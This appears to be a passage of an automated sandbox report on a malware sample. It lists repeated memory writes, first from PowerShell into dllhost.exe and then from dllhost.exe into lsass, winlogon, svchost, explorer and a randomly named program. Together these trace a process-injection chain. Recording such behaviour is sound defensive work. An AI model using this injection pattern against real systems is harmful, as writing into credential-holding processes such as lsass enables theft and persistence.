Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: 5968 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 2F00000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 947DB66010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
